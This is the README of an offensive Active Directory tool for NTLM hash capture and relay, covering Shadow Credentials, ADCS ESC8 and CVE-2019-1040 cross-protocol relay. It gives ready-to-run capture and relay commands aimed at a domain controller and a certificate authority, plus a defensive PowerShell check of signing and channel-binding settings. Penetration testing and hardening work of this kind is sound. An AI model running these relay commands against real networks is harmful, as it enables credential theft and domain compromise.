NTLM Credential Interception & Relay Toolkit
High-performance Go-based tool for Active Directory security assessments
Features • Installation • Quick Start • Documentation
Credgoblin is a security assessment tool designed for capturing and relaying NTLM authentication in Active Directory environments. Built entirely in Go for performance and portability, it provides a unified solution for:
- Hash Capture — Intercept NTLMv2 credentials from SMB, HTTP, and HTTPS connections
- LDAP Relay — Perform Shadow Credentials attacks via `msDS-KeyCredentialLink` modification
- ADCS Relay — Exploit ESC8 misconfiguration through certificate enrollment abuse
- Cross-Protocol Relay — Chain SMB→LDAP, SMB→HTTP, and HTTP→LDAP attacks
| Capability | Description |
|---|---|
| Multi-Protocol Listeners | SMB (445), HTTP (80), HTTPS (443) with auto-generated TLS certificates |
| Hashcat Integration | Export NTLMv2 hashes in -m 5600 format |
| Shadow Credentials | LDAP/LDAPS relay with KeyCredential injection and PFX export |
| ADCS ESC8 | Certificate enrollment via web interface relay |
| CVE-2019-1040 | Drop-the-MIC implementation for cross-protocol attacks |
| SICILY Protocol | Native Microsoft LDAP NTLM authentication support |
- Go 1.23 or later
- Root/Administrator privileges (required for low ports)
- Platform — Linux, macOS, or Windows
```bash
git clone https://github.com/ineffectivecoder/credgoblin.git
cd credgoblin
go build -o credgoblin ./cmd/credgoblin
```

```bash
# Listen on all protocols
sudo ./credgoblin capture -i 0.0.0.0

# HTTPS only (required for WebClient coercion)
sudo ./credgoblin capture -i 0.0.0.0 -p 443 -o hashes.txt
```

```bash
# Relay to LDAP and inject Shadow Credentials
sudo ./credgoblin relay -t ldap://dc.domain.local \
  -u 'CN=DC01,CN=Computers,DC=domain,DC=local'
```

```bash
# Relay to ADCS web enrollment
sudo ./credgoblin relay -m adcs \
  -t http://ca.domain.local/certsrv \
  -T User
```

| Option | Description | Default |
|---|---|---|
| `-i, --interface` | Listen address | `0.0.0.0` |
| `-p, --ports` | Ports (`80`, `443`, `445`, `both`, or comma-separated) | `both` |
| `-o, --output` | Output file for hashes | `hashes.txt` |
| `-v, --verbose` | Enable verbose logging | `false` |
| Option | Description | Required |
|---|---|---|
| `-t, --target` | Target URL (`ldap://`, `ldaps://`, `http://`, `https://`) | ✓ |
| `-m, --mode` | Attack mode (`ldap` or `adcs`) | — |
| `-u, --target-user` | Target Distinguished Name | LDAP mode |
| `-T, --template` | Certificate template name | ADCS mode |
| `-o, --output` | Output PFX path | — |
| `-P, --pfx-pass` | PFX password | — |
For detailed attack scenarios, technical implementation details, and protocol documentation, see the docs directory.
- Shadow Credentials — Inject `msDS-KeyCredentialLink` for PKINIT-based authentication
- ESC8 — Abuse misconfigured ADCS web enrollment for certificate issuance
- WebClient Abuse — Coerce HTTP authentication via WebDAV service
- Cross-Protocol Relay — Bypass signing requirements with CVE-2019-1040
| Limitation | Impact |
|---|---|
| SMB Signing Required | Relay attacks blocked |
| LDAP Signing Required | Domain controller relay blocked |
| EPA/Channel Binding | Server 2022+ may enforce by default |
| MIC Validation | Patched systems may validate MIC |
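The limitations in the table above are host settings that defenders can verify directly. The following PowerShell is an added example, not part of credgoblin, that reads the registry values behind SMB signing, LDAP signing and LDAPS channel binding on a Windows host; run it elevated on a domain controller, since the NTDS values only exist there. The registry paths and value meanings are Microsoft's documented ones; the report layout is this example's own.

```powershell
# Added example (not part of credgoblin): audit the settings that block NTLM relay.
# Run elevated on a domain controller; on a member server only the SMB row is meaningful.

function Get-RegDword {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or value is absent, i.e. the Windows default applies.
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

$smbPath  = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$ntdsPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'

# SMB server signing: RequireSecuritySignature = 1 means every client must sign (relay of SMB auth fails).
$smbSign = Get-RegDword $smbPath 'RequireSecuritySignature'

# LDAP signing: LDAPServerIntegrity = 2 is "Require signing" (relayed NTLM cannot bind to the DC over LDAP).
$ldapSign = Get-RegDword $ntdsPath 'LDAPServerIntegrity'

# LDAPS channel binding (EPA): LdapEnforceChannelBinding 2 = Always, 1 = When supported, 0 = Never.
$ldapCbt = Get-RegDword $ntdsPath 'LdapEnforceChannelBinding'

$findings = @(
    [pscustomobject]@{
        Control  = 'SMB signing required'
        Value    = $smbSign
        Hardened = ($smbSign -eq 1)
        Blocks   = 'SMB -> LDAP / SMB -> HTTP relay'
    },
    [pscustomobject]@{
        Control  = 'LDAP signing required'
        Value    = $ldapSign
        Hardened = ($ldapSign -eq 2)
        Blocks   = 'Relay to LDAP (Shadow Credentials)'
    },
    [pscustomobject]@{
        Control  = 'LDAPS channel binding (EPA)'
        Value    = $ldapCbt
        Hardened = ($ldapCbt -eq 2)
        Blocks   = 'Relay to LDAPS'
    }
)

# A $null Value means the setting is unconfigured and the OS default is in effect.
$findings | Format-Table -AutoSize
```

The ADCS web enrollment EPA setting from the ESC8 row lives in IIS configuration rather than the registry, so it is not covered by this check.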
Inspired by and building upon research from:
- Impacket — ntlmrelayx reference
- Responder — Hash capture techniques
- PKINITtools — PKINIT authentication
- Certipy — ADCS attack research
For authorized security testing and research only.
Usage of this tool for attacking systems without prior mutual consent is illegal. The developer assumes no liability for misuse or damages.
MIT License • © 2024
